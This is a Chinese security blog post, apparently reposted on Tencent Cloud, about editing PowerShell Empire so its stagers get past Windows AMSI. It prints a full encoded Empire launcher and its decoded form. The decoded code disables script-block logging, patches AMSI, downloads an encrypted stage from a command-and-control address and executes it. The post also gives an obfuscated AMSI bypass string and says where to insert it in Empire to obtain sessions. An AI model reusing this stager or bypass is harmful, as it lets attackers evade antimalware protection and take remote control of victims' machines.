专栏首页鸿鹄实验室构建自定义的Empire模块来绕过amsi

构建自定义的Empire模块来绕过amsi

今天逛推特,看到了某师傅通过自定义Empire模块来绕过amsi,地址如下:https://twitter.com/_vinnybod/status/1386442836417994752

但可惜的是,作者没有给出任何的细节,于是本人便自行尝试了一把,并记录下来操作过程。但是Empire的最新版本是3.8.2,所以我们的测试环境也就是github的最新版本,下载地址如下:

https://github.com/BC-SECURITY/Empire/releases/tag/v3.8.2

安装过程这边就先略过了,本身Empire也提供了安装脚本,傻瓜式安装即可。我们以基本的http监听其为例

可以看到其给出的相关选项,包括新加入的抖动值和profile选项。执行并生成powershell载荷

powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAFIAcwBpAE8ATgBU
AGEAQgBsAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAE8AUgAgAC0ARwBlACAA
MwApAHsAJABCAEUAMgBlADMAPQBbAFIAZQBmAF0ALgBBAFMAcwBFAG0AQgBMAHkALgBH
AGUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQA
LgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBlAFQARgBp
AGUAYABsAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFM
AZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdAB
hAHQAaQBjACcAKQA7AEkARgAoACQAYgBFADIARQAzACkAewAkADgAZgBBADEAQgA9ACQ
AQgBFADIAZQAzAC4ARwBFAFQAVgBBAEwAVQBFACgAJABuAFUAbABMACkAOwBJAGYAKA
AkADgAZgBBADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnA
GcAaQBuAGcAJwBdACkAewAkADgARgBBADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsA
JwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcg
BpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA
4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBn
AGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBvAEwAbABFAGMAdABpAE8ATgBzAC4ARwBlAE4ARQByAGkAYwAuAEQASQBjAHQASQBvAG4AQQBSAFkAWwBzAFQAUgBJAE4AZwAsAFMAeQBTAHQARQBtAC4ATwBiAEoAZQBjAHQAXQBdADoAOgBuAGUAVwAoACkAOwAkAFYAQQBMAC4AQQBEAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAQQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBCAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAYQBMAH0ARQBsAFMAZQB7AFsAUwBjAFIAaQBwAHQAQgBMAE8AYwBrAF0ALgAiAEcAZQBUAEYAaQBFAGAATABkACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdABWAEEAbABVAGUAKAAkAE4AVQBsAEwALAAoAE4ARQB3AC0ATwBCAEoAZQBDAFQAIABDAG8AbABsAEUAYwB0AGkAbwBuAHMALgBHAEUATgBlAFIAaQBjAC4ASABhAHMASABTAEUAVABbAFMAVABSAGkATgBnAF0AKQApAH0AJABSAGUARgA9AFsAUgBlAEYAXQAuAEEAUwBTAGUATQBCAGwAWQAuAEcARQBUAFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIAZQBGAC4ARwBlAHQARgBpAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAEEATABVAEUAKAAkAG4AVQBsAEwALAAkAFQAcgBVAGUAKQA7AH0AOwBbAFMAeQBTAFQAZQBtAC4ATgBFAFQALgBTAGUAUgBWAGkAYwBFAFAATwBpAG4AVABNAEEATgBhAEcARQBSAF0AOgA6AEUAeABQAGUAQwB0ADEAMAAwAEMAbwBuAFQASQBuAFUAZQA9ADAAOwAkAEUANgBDAEMANQA9AE4AZQBXAC0ATwBCAEoAZQBjAHQAIABTAHkAUwBUAEUATQAuAE4ARQBUAC4AVwBlAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AYwBvAEQASQBuAGcAXQA6ADoAVQBuAGkAQwBPAGQAZQAuAEcARQBUAFMAVABSAEkAbgBHACgAWwBDAE8AbgB2AGUAcgBUAF0AOgA6AEYAUgBvAG0AQgBhAHMAZQA2ADQAUwB0AFIASQBuAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBnAEEAdQBBAEQARQBBAE0AUQBBADAAQQBEAG8AQQBOAEEAQQAwAEEARABRAEEATgBBAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJABFADYAQwBjADUALgBIAEUAYQBkAGUAUgBTAC4AQQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABFADYAYwBjADUALgBQAHIATwB4AFkAPQBbAFMAeQBTAFQARQBNAC4ATgBlAFQALgBXAEUAYgBSAGUAcQBVAGUAUwBUAF0AOgA6AEQAZQBGAEEAdQBMAHQAVwBFAGIAUABSAG8AeAB5ADsAJABFADYAQwBjADUALgBQAHIATwBYAHkALgBDAFIAZQBEAEUAbgB0AEkAQQBMAHMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4AZQBUAC4AQwBSAEUAZABlAG4AdABpAGEATABDAEEAQwBIAEUAXQA6ADoARABlAGYAQQBVAEwAdABOAEUAVABXAG8AUgBrAEMAUgBFAGQAZQBOAHQASQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJABlADYAYwBjADUALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBTAFQARQBNAC4AVABFAFgAdAAuAEUATgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAFkAdABFAHMAKAAnADIAPwBVADQAUABaAF4AQwBLAHAAKABbAC0APgBRACoAKwBkAC8AQgBTAGMALABUAEcAMwBOAHcASABFAHkAawAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQBSAGcAUwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAFgAbwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAGUANgBjAGMANQAuAEgARQBBAEQAZQByAHMALgBBAGQARAAoACIAQwBvAG8AawBpAGUAIgAsACIAdgBGAHMAUgBUAHgAYwBIAG0AcwA9AEQARgB2AFEASABHAHEAYwBHAGcARQBYAEUAdgBHADQAYwBHAEUANABWAHAAUgBaAGsATwA0AD0AIgApADsAJABEAEEAVABBAD0AJABFADYAYwBDADUALgBEAG8AdwBuAEwATwBBAEQARABBAHQAQQAoACQAcwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAGEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4ARwB0AEgAXQA7AC0ASgBPAEkAbgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=

base64解码后如下:

('cachedGroupPolicySettings','N'+'onPublic,Static');IF($bE2E3){$8fA1
B=$BE2e3.GETVALUE($nUlL);If($8fA1b['ScriptB'+'lockLogging']){$8FA1b[
'ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$8fa1b['Sc
riptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$Val=[
CoLlEctiONs.GeNEric.DIctIonARY[sTRINg,SyStEm.ObJect]]::neW();$VAL.AD
d('EnableScriptB'+'lockLogging',0);$VAL.Add('EnableScriptBlockInvoca
tionLogging',0);$8fa1B['HKEY_LOCAL_MACHINE\Software\Policies\Micros
oft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ElSe{[ScRiptBLOc
k]."GeTFiE`Ld"('signatures','N'+'onPublic,Static').SetVAlUe($NUlL,(N
Ew-OBJeCT CollEctions.GENeRic.HasHSET[STRiNg]))}$ReF=[ReF].ASSeMBlY.GETTYpE('System.Management.Automation.Amsi'+'Utils');$ReF.GetFieLd('amsiInitF'+'ailed','NonPublic,Static').SEtVALUE($nUlL,$TrUe);};[SySTem.NET.SeRVicEPOinTMANaGER]::ExPeCt100ConTInUe=0;$E6CC5=NeW-OBJect SySTEM.NET.WeBCLIeNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TExT.ENcoDIng]::UniCOde.GETSTRInG([COnverT]::FRomBase64StRIng('aAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADEAMQA0ADoANAA0ADQANAA=')));$t='/news.php';$E6Cc5.HEadeRS.AdD('User-Agent',$u);$E6cc5.PrOxY=[SySTEM.NeT.WEbReqUeST]::DeFAuLtWEbPRoxy;$E6Cc5.PrOXy.CReDEntIALs = [SYSTeM.NeT.CREdentiaLCACHE]::DefAULtNETWoRkCREdeNtIals;$Script:Proxy = $e6cc5.Proxy;$K=[SYSTEM.TEXt.ENcoding]::ASCII.GetBYtEs('2?U4PZ^CKp([->Q*+d/BSc,TG3NwHEyk');$R={$D,$K=$ARgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXoR$S[($S[$I]+$S[$H])%256]}};$e6cc5.HEADers.AdD("Cookie","vFsRTxcHms=DFvQHGqcGgEXEvG4cGE4VpRZkO4=");$DATA=$E6cC5.DownLOADDAtA($sER+$T);$iV=$dAtA[0..3];$DAta=$DaTA[4..$DATA.lenGtH];-JOIn[CHar[]](& $R $daTa ($IV+$K))|IEX

我们没必要去关心这些代码具体去做了什么,我们只需要知道,这个代码是会被拦截的就够了。

最简单来说我们可以使用Amsi.fail来生成我们的载荷

比如下面这样

[Ref].AsSEMbly.GeTtype('System.Management.Automation.'+
$([SYsTeM.NET.weButIlity]::HTmLDEcodE('Amsi'))+
'Utils').GetField(''+$([CHAr]([BYTe]0x61)+[chAR](81+28)+
[char](211-96)+[cHaR](149-44))+'InitFailed',$([CHaR]
([byTe]0x4E)+[ChAr](198-87)+[CHaR](1980/18)+[CHAR](77+3)+
[ChAr]([Byte]0x75)+[CHar](5684/58)+[cHAR]([BYte]0x6C)+[ChAR]
([BYtE]0x69)+[ChaR]([BYTE]0x63)+[chAR]([bYtE]0x2C)+[ChAR]
([Byte]0x53)+[cHAR](116)+[ChAR](97)+[chaR]([BytE]0x74)+
[Char](68+37)+[cHAr](78+21))).Set

这样再执行,就不会被拦截了:

而所有的empire是可以通过set来进行设置的

文件位置如下:

/lib/common/bypasses.py

然后把刚刚生成的,加入进去即可,为了流量等问题,我们再更改监听器的部分设置

然后生成,执行,获得会话:

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f),作者:鸿鹄实验室a

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-04-28

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 无招胜有招: 看我如何通过劫持COM服务器绕过AMSI

    ? 在Windows 10中,Microsoft的反恶意软件扫描接口(AMSI)被作为新功能被引入,作为标准接口,该功能可以让反病毒引擎将特征规则应用于机器的...

    FB客服
  • Red Team 工具集之攻击武器库

    上图是一个 Red Team 攻击的生命周期,整个生命周期包括:信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上...

    信安之路
  • 使用Chimera混淆PowerShell代码绕过安防产品

    Chimera是一款功能强大的PowerShell混淆脚本,它可以帮助广大研究人员实现AMSI和安全防护产品(解决方案)绕过。该脚本可以利用字符串替换和变量串联...

    FB客服
  • Antimalware Scan Interface (AMSI)—反恶意软件扫描接口的绕过

    反恶意软件扫描接口(AMSI)是MicrosoftWindows保护系统,旨在保护计算机免受通过脚本语言(例如PowerShell,VBScript,JavaS...

    洛米唯熊
  • 适用于渗透测试不同阶段的工具收集整理

    该资源清单列表涵盖了一系列,适用于渗透测试不同阶段的开源/商业工具。如果你想为此列表添加贡献,欢迎你向我发送pull request。

    FB客服
  • MeterPwrShell:绕过AMSI,绕过防火墙,绕过UAC和绕过任何AV

    生成Powershell Oneliner的自动化工具,该工具可以在Metasploit,Bypass AMSI,Bypass防火墙,Bypas...

    Aran
  • 绕过AMSI进行逃避审计

    在之前的文章,hook rdp对外连接的账号密码 中有提到利用Detours进行hook得到rdp的账号密码,今天正好看到绕过AMSI的文章,那我们今天继续利用...

    Jumbo
  • Powershell最佳安全实践

    ? 写在前面的话 其实很早之前,攻击者就已经开始使用合法工具来渗透目标网络并实现横向攻击了。理由很简单:使用合法工具可以降低被检测到的几率,而且进过授权的工具...

    FB客服
  • 如何使用MeterPwrShell自动生成PowerShell Payload

    MeterPwrShell是一款功能强大的自动化工具,可以帮助广大研究人员以自动化的形式生成完美的PowerShell Payload。MeterPwrShel...

    FB客服
  • Empire:PowerShell后期漏洞利用代理工具

    文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用! Empire是一个纯碎的PowerShell后期漏洞利用代理工具,它建立在密码学、...

    FB客服
  • HTTP-revshell:能绕过AMSI的PowerShell代理感知型反向Shell

    HTTP-revshell是一个能够绕过AMSI的PowerShell代理感知型反向Shell,这款工具转为红队研究人员以及渗透测试人员设计,能够通过HTTP/...

    FB客服
  • 内网工具学习之Empire后渗透

    Empire一款基于PowerShell的后渗透测试工具。感谢某葵和某Egg的推荐和指点。感谢某骗子给我解惑DNS的一些东西。

    ChaMd5安全团队
  • Antimalware Scan Interface Provider for Persistence

    Windows 反恶意软件扫描接口 (AMSI) 是微软推出一种通用接口标准,允许的应用程序和服务与机器上存在的任何毒软件进行调用。AMSI 为的最终用户及其数...

    黑白天安全
  • GadgetToJScript在VBA中的利用

    https://www.shutingrz.com/post/explore-dotnet-serialize-g2js/

    鸿鹄实验室
  • 利用SSH隧道加密、隐蔽C&C通信流量

    在网络攻防博弈中,网络流量特征分析类安全防御措施得到了广泛应用。众多厂商和企业对网络流量进行恶意流量分析检测,从而针对性的采取防御措施,如各级ISP在骨干网络设...

    FB客服
  • 11.反恶意软件扫描接口 (AMSI)

    Windows 反恶意软件扫描接口 (AMSI) 是一种通用接口标准,可以集成在应用程序和服务与机器上存在的任何反恶意软件产品中。可以增强杀毒软件的查杀能力。

    黑白天安全
  • 【译】使用Apache的mod重写来保护你的C2 Empire

    背景 伴随着维基红色团队基础架构(Red Team Infrastructure Wiki)的发布,今年圣诞节早早来临。 它在Jeff Dimmock和Stev...

    安恒网络空间安全讲武堂
  • 利用PowerShell Empire实现Word文档DDE攻击控制

    ? 近期,有安全人员发现了一种DynamicData Exchange (DDE)协议绕过MSWord和MSExcel宏限制,不需使用MSWord和MSExc...

    FB客服
  • 从远程桌面服务到获取Empire Shell

    本文将为大家详细介绍如何在只能访问远程桌面服务,且有 AppLocker 保护 PowerShell 处于语言约束模式下获取目标机器 Empire shell。...

    FB客服

扫码关注云+社区

领取腾讯云代金券